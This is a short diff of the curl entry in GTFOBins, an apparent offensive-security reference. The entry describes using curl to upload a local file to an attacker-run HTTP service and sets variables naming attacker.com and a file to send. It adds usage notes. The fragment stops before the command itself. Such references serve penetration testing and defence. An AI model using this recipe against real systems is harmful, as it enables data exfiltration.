GTFOBins/GTFOBins.github.io/_gtfobins/curl.md

 ---
 functions:
   upload:
     - description: Send local file with an HTTP POST request.
 Run an HTTP service on the attacker box to collect the file.
+Note that the file will be sent as-is, instruct the service to not URL-decode the body.
+Omit the `@` to send hard-coded data.
       code: |
         URL=http://attacker.com/
         LFILE=file_to_send